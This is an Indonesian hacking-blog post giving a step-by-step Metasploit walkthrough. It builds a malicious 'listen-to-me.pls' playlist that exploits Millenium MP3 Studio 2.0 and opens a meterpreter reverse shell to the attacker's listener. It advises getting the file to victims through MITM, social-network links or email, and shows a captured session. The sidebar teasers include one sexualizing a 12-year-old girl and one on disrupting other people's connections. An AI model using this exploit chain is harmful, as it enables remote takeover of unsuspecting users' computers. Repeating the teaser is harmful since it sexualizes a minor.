Metasploit VS Millenium MP3 Studio 2.0
Metasploit VS Millenium MP3 Studio 2.0
Preparation :
[*] Metasploit
[*] Apache2
Briefing :
[*] Buat file 0day untuk Millenium MP3 Studio 2.0
[*] Pindahkan file 0day ke directory /var/www/
[*] Tunggu hingga korban memainkan file 0day kita
[*] Game Over
Walkthrough:
1. Buat file 0day untuk Millenium MP3 Studio 2.0
Command :
msf > use exploit/windows/fileformat/millenium_mp3_pls
Kemudian, kita setting file 0day kita.
Command :
msf exploit(millenium_mp3_pls) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(millenium_mp3_pls) > set LHOST 172.16.230.1LHOST => 172.16.230.1msf exploit(millenium_mp3_pls) > set LPORT 4444LPORT => 4444msf exploit(millenium_mp3_pls) > set FILENAME listen-to-me.plsFILENAME => listen-to-me.plsmsf exploit(millenium_mp3_pls) > set EXITFUNC noneEXITFUNC => none
Cek eksploit kita untuk memastikan tidak ada parameter yang kosong.
Command :
msf exploit(millenium_mp3_pls) > show options
Module options (exploit/windows/fileformat/millenium_mp3_pls): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME listen-to-me.pls yes The file name.Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC none yes Exit technique: seh, thread, process, none LHOST 172.16.230.1 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Windows Universal
Kemudian masukan perintah exploit untuk membuat file 0day.
Command :
msf exploit(millenium_mp3_pls) > exploit
[*] Creating 'listen-to-me.pls' file ...[+] listen-to-me.pls stored at /root/.msf4/local/listen-to-me.pls
Ok. File kita sudah dibuat, dan di simpan di dalam direktori /root/.msf4/local/ bernama listen-to-me.pls
2. Pindahkan file listen-to-me.pls ke direktori /var/www
Gunakan perintah mv, atau cp untuk memindahkan file ini.
Command :
root@revolution:~# cp /root/.msf4/local/listen-to-me.pls /var/www/
Kemudian cek kembali bahwa file kita sudah terpindah ke direktori /var/www/
Command :
root@revolution:~# cd /var/www/
root@revolution:/var/www# lltotal 54680drwxr-xr-x 4 root root 4096 2012-01-08 14:05 ./drwxr-xr-x 16 root root 4096 2011-06-08 20:16 ../drwxr-xr-x 10 www-data www-data 4096 2012-01-07 19:36 beef/-rw-r--r-- 1 root root 8156634 2009-12-10 07:48 BigAntServer_Enu_Setup.exe-rwxrwxrwx 1 root root 7983311 2011-11-01 15:06 ca_setup.exe*-rw-r--r-- 1 root root 4160 2012-01-08 14:05 listen-to-me.pls-rwxrwxrwx 1 root root 1851184 2012-01-05 18:36 millennium.exe*-rw-r--r-- 1 root root 102476 2012-01-07 19:57 minishare-1.4.1.exe-rwxrwxrwx 1 root root 1269567 2011-12-27 16:51 Savant31.exe*-rwxrwxrwx 1 root root 17050136 2011-11-27 09:43 ServUSetup.exe*-rwxrwxrwx 1 root root 19541182 2011-11-01 15:05 wireshark-win32-1.6.2.exe*drwxr-xr-x 2 root root 4096 2011-05-10 14:44 wstool/
Sekarang kita tunggu hingga seseorang mengabil file ini, kemudian mengeksekusinya dengan program Millenium MP3 Studio 2.0. Anda bisa menggunakan cara MITM atau mengirim malicious link kepada korban melalui jejaring social, atau email. Jangan lupa untuk mengaktifkan multi/handler pada metasploit.
Command :
msf exploit(millenium_mp3_pls) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 172.16.230.1LHOST => 172.16.230.1msf exploit(handler) > set LPORT 4444LPORT => 4444
Cek kembali exploit multi handler kita.
Command :
msf exploit(handler) > show options
Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 172.16.230.1 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Target
Kemudian exploit untuk menjalankan multi handler
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...
3. Korban masuk kedalam perangkap.
Dan ini yang akan terjadi ketika korban masuk ke dalam perangkap.
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 172.16.230.128[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1187) at 2012-01-08 15:27:02 +0700meterpreter >
Excellent like usual =)
About: jefri
You may also like...
Langganan:
Posting Komentar (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
pada kamus ini terdapat pilihan opsi dari bahasa Perancis ke Indonesia, dari bahasa Indonesia ke Perancis, lihat seluruh kata, tes, help se...
-
Situs jejaring sosial seperti Twitter dan Facebookbisa menjadi sarana flirting dan aturan berpacaran lewat situs jejaring sosial ini...
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Buat Ngerjaain Koneksi Orang Gunakan Seperlunya... Misalnya buat mutusin koneksi orang yang lagi buka situs porno
-
Apakah Anda punya sahabat atau rekan yang tampan, mapan tapi sampai sekarang masih senang sendiri dan belum berkeinginan punya pacar. Wa...
-
ada model baru dari vietnam. baru 12 taun gan. liat kaki nya deh gan, bikin deg deg an Cewek Idaman : Lê Hoàng Bảo Trân (Le Hoang Bao ...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)
Tidak ada komentar:
Posting Komentar